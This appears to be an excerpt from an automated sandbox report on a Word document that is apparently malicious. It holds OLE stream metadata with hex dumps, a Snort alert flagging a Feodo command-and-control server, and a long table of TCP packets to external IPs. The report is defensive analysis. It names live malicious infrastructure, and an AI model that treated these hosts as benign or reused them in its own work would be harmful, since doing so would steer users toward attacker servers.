General
Stream Path:	WordDocument
File Type:	data
Stream Size:	97248
Entropy:	6.56028805033
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 f1 9a 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 e0 7b 01 00 62 7f 00 00 62 7f 00 00 f1 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Stream Path: word, File Type: data, Stream Size: 435

General
Stream Path:	word
File Type:	data
Stream Size:	435
Entropy:	7.51532274815
Base64 Encoded:	False
Data ASCII:	. . . . . . . . q . 8 N . . = . . . r . . 9 . n $ H . M . a . . . . v . / . . . . . . . z 3 . f . . . 5 . . } . Z + . J b . . . . { ` . . F . . . ] : 0 . . . . . H y . R . . . z . . . . . . . ; . . . . . . . . F ~ a . L . f 7 . . . 2 . . [ } . { . . . . . . " . . o . . . e . . . 0 . . - . 6 . # . . . V R ) . 2 V . . A s y . . V . . B . . . G 3 . * . . M . s . . . . > . . F s . X I . n . . . . . . @ . o . . . " . . . ] . r p I . [ . . . . . . . . l @ . . t . . v " 3 n @ Q 0 . \| . H . . O . . % . Z A g . . .
Data Raw:	f2 dd 99 e7 92 11 fa 1f 71 ef 38 4e ee fa 3d f7 81 b1 72 fe 06 39 83 6e 24 48 ae 4d 84 61 e4 bc ee f8 76 f6 2f b8 fb 14 c3 d5 1f 8f 7a 33 c7 66 d4 ce 0e 35 be 2e 7d b9 5a 2b c3 4a 62 ac 9a 10 0a 7b 60 f5 83 46 c8 c8 b6 5d 3a 30 19 f4 f3 f0 80 48 79 b6 52 af fd bf 7a bd 9c 04 f5 b1 b2 17 3b 0f 84 ff d2 d1 e2 8e 05 46 7e 61 f3 4c 9f 66 37 d2 c9 1a 32 e4 bd 5b 7d a0 7b c6 a9 c4 d2 05

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/25/21-20:12:58.825219	TCP	2404322	ET CNC Feodo Tracker Reported CnC Server TCP group 12	49171	80	192.168.2.22	190.55.186.229

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 20:10:44.496392965 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:10:44.650060892 CET	80	49165	172.217.6.174	192.168.2.22
Jan 25, 2021 20:10:44.650192022 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:10:44.653403997 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:10:44.807074070 CET	80	49165	172.217.6.174	192.168.2.22
Jan 25, 2021 20:10:44.807477951 CET	80	49165	172.217.6.174	192.168.2.22
Jan 25, 2021 20:10:44.807496071 CET	80	49165	172.217.6.174	192.168.2.22
Jan 25, 2021 20:10:44.807576895 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:10:44.878856897 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:44.918772936 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:44.918875933 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:44.934160948 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:44.974442959 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:44.976679087 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:44.976731062 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:44.976869106 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:44.990708113 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:45.030774117 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:45.031075954 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:45.237993956 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:45.277595043 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:10:45.277751923 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:45.315522909 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:10:45.355663061 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:12:24.791357994 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:12:24.875777960 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:12:24.916229963 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:12:24.916246891 CET	443	49166	104.21.88.166	192.168.2.22
Jan 25, 2021 20:12:24.916325092 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:12:24.916347027 CET	49166	443	192.168.2.22	104.21.88.166
Jan 25, 2021 20:12:24.945759058 CET	80	49165	172.217.6.174	192.168.2.22
Jan 25, 2021 20:12:24.945846081 CET	49165	80	192.168.2.22	172.217.6.174
Jan 25, 2021 20:12:27.330430031 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.374927044 CET	80	49167	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.375019073 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.375190020 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.419518948 CET	80	49167	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.685669899 CET	80	49167	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.750864983 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.795397997 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.795505047 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.796173096 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.840496063 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.842187881 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.842209101 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.842226982 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.842384100 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.853910923 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.895045996 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.898761034 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.923237085 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:27.928705931 CET	80	49167	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:27.928848028 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:28.006716967 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:28.277040005 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:28.277066946 CET	443	49168	212.227.200.73	192.168.2.22
Jan 25, 2021 20:12:28.277144909 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:28.354706049 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.394570112 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.394645929 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.395123005 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.434878111 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.434906006 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.434926987 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.434945107 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.434956074 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.434973955 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.434999943 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.435795069 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.445310116 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.485366106 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.690653086 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:28.729492903 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:28.729617119 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.266544104 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.349483013 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912735939 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912786007 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912826061 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912843943 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.912864923 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912903070 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912909031 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.912942886 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912981033 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.912992001 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.913026094 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.913068056 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.913081884 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.913106918 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.913146019 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.913163900 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.913184881 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.913230896 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.915659904 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.915704966 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.915745974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.915755033 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.918756008 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.918853998 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953205109 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953278065 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953330040 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953409910 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953437090 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953489065 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953524113 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953552008 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953612089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953628063 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953670979 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953738928 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953749895 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953788042 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953840017 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953877926 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.953901052 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.953954935 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.956125021 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.956182003 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.956269026 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.958489895 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.958560944 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.958662033 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.960800886 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.960869074 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.960958958 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.962908030 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.962951899 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.963017941 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:29.965147018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.965167046 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:29.965321064 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.077738047 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.077783108 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.077816010 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.077908993 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.077931881 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.077977896 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.078392029 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.078429937 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.078484058 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.079951048 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.079991102 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.080406904 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.081502914 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.081537008 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.081598043 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.083064079 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.083110094 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.083172083 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.084647894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.085633039 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.085717916 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.086172104 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.086220026 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.086277962 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.087795973 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.087835073 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.087899923 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.089355946 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.089421988 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.089518070 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.090861082 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.090912104 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.090980053 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.092397928 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.092449903 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.092519045 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.093931913 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.093991041 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.094048977 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.094067097 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.094108105 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.094175100 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.095596075 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.095659018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.095721006 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.097018003 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.097064972 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.097165108 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.098639011 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.098695993 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.098798037 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.100182056 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.100240946 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.100341082 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.166903019 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.166934967 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.166950941 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.167066097 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.167490005 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.167515039 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.167563915 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.168838978 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.168865919 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.168926001 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.170133114 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.170156956 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.170212984 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.171468019 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.171487093 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.171542883 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.171621084 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.171684980 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.171726942 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.172771931 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.172897100 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.172980070 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.174113035 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.174143076 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.174189091 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.175415039 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.175440073 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.175493956 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.176789045 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.176806927 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.176855087 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.178065062 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.178086042 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.178153038 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.179373980 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.179394960 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.179440975 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.180700064 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.180851936 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.180900097 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.182060957 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.182087898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.182142019 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.183336020 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.183365107 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.183409929 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.184721947 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.184741020 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.184798956 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.206922054 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.206950903 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.207021952 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.207984924 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.208007097 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.208026886 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.208053112 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.208807945 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.208837032 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.208872080 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.210165024 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.210191011 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.210238934 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.211539030 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.211561918 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.211596966 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.212793112 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.212814093 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.212831974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.212857008 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.212858915 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.212896109 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.214148998 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.214169979 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.214212894 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.215436935 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.215457916 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.215502977 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.216790915 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.216814041 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.216864109 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.218059063 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.218080997 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.218118906 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.219402075 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.219424009 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.219480991 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.220694065 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.220721960 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.220763922 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.222027063 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.222054958 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.222091913 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.223316908 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.228782892 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.228809118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.228879929 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.229428053 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.229454041 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.229491949 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.230695009 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.230715990 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.230753899 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.231988907 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.232011080 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.232048988 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.233359098 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.233378887 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.233416080 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.234630108 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.234652042 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.234695911 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.235971928 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.235996008 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.236043930 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.237308979 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.237334013 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.237354994 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.237379074 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.237380981 CET	49169	443	192.168.2.22	192.0.78.20
